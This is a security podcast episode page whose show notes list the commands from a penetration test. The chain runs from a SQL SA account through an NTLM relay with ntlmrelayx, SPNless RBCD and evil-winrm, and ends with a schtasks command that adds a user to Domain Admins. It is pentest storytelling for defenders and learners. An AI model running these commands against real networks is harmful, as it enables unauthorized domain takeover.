7MS #691: Tales of Pentest Pwnage – Part 75
7 Minute Security5 Sep 2025

7MS #691: Tales of Pentest Pwnage – Part 75

Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? yes. Do I mean it? Yes. Here are all the commands/links to supplement today's episode:

  • Got an SA account to a SQL server through Snaffler-ing
  • With that SA account, I learned how to coerce Web auth from within a SQL shell – read more about that here
  • I relayed that Web auth with ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv
  • I didn't have a machine account under my control, so I did SPNless RBCD on my lowpriv account – read more about that here
  • Using that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket
  • From there I checked out who had interactive logons: Get-Process -IncludeUserName explorer | Select-Object UserName
  • Then I queued up a fake task to elevate me to DA: schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
  • …and ran it: schtasks /run /tn "TotallyFineTask"

Episoder(712)

7MS #712: How to Secure Your Community - Part 2

7MS #712: How to Secure Your Community - Part 2

Hello friends.  Today's episode piggybacks off of last week's discussion of Operation Metro Surge and how it has affected the state of Minnesota.  I also highly encourage you to read this Rolling Ston...

6 Mar 37min

7MS #711: How to Secure Your Community

7MS #711: How to Secure Your Community

Hello friends, it's good to be back with you.  I took a podcast hiatus in January to focus on helping communities affected by Operation Metro Surge.  Today I share how my family and community has been...

27 Feb 51min

7MS #710: I'm Taking a Break

7MS #710: I'm Taking a Break

Hi friends, I'm going to be taking a break from producing podcast episodes, as well as content over at 7MinSec.club.  It's a temporary break, so please don't unsubscribe, unfollow, etc.  I need some e...

17 Jan 4min

7MS #709: Second Impressions of Twingate

7MS #709: Second Impressions of Twingate

Hey friends, in episode #649 I gave you my first impressions of Twingate.  It's been a minute, so I thought I'd revisit Twingate (specifically this awesome Twingate LXC) and talk about how we're using...

10 Jan 20min

7MS #708: Tales of Pentest Fail – Part 6

7MS #708: Tales of Pentest Fail – Part 6

After sharing a recent story about how a phishing campaign went south, I heard feedback from a lot of you.  You either commiserated with my story, told me I wussed out, and/or had a difficult story of...

2 Jan 25min

7MS #707: Our New Pentest Course Has Launched!

7MS #707: Our New Pentest Course Has Launched!

Today we're thrilled to announce the launch of LPLITE:GOAD (Light Pentest Live Interactive Training Experience: Game of Active Directory). The first class is coming up Tuesday, January 27 – Thursday, ...

26 Des 202514min

7MS #706: Tales of Pentest Pwnage – Part 80

7MS #706: Tales of Pentest Pwnage – Part 80

I'm so excited to share today's tale of pentest pwnage, because it brings back to life a coercion technique I thought wouldn't work against Windows 11! Spoiler alert: check out rpc2efs, as well as the...

19 Des 202529min

7MS #705: A Phishing Campaign Fail Tale

7MS #705: A Phishing Campaign Fail Tale

This might be obvious, but security is not all domain admin dancing and maximum pwnage. Sometimes, despite my best efforts, a security project does a faceplant. Today's episode focuses on a phishing c...

12 Des 202521min

Populært innen Politikk og nyheter

giver-og-gjengen-vg
aftenpodden
stopp-verden
forklart
aftenpodden-usa
i-retten
lydartikler-fra-aftenposten
popradet
det-store-bildet
rss-gukild-johaug
dine-penger-pengeradet
rss-ness
fotballpodden-2
hanna-de-heldige
aftenbla-bla
nokon-ma-ga
grasoner-den-nye-kalde-krigen
frokostshowet-pa-p5
e24-podden
rss-penger-polser-og-politikk